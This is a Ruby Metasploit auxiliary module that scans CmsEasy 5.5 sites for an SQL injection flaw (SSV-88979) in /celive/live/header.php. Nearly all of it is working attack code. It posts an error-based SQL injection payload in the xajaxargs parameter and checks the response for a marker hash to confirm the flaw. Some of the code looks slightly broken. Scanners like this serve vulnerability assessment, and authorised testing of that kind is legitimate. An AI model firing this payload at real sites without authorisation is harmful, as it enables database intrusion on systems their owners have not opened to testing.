# CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQLI vulnerability

require "open-uri"  
require 'net/https'

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'SSV_88979_PoC',
        'Description'    => 'This module is used to scan the target site for SSV-88979,which is aslo called CmsEasy 5.5 UTF-8 20140802/celive/live/header.php SQLI vulnerability',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    
    def run_host(ip)
  
      uri = datastore['TARGETURI'] + '/celive/live/header.php'  
      params={}
      params['xajaxargs[0][name]']="1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2') #"
      params["xajax"] = 'LiveMessage'


      begin
        res = Net::HTTP.post_form(uri, params) 
    
        if res.body["e165421110ba03099a1c0393373c5b43"]
            print_warning("The SSV-88979 vulnerability exists at the target site!")
        else
            print_good("The SSV-88979 vulnerability was not detected at the target site.")
        end
    
      rescue => ex
        if ex.message['404']
          print_good('The SSV-88979 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
      end
  end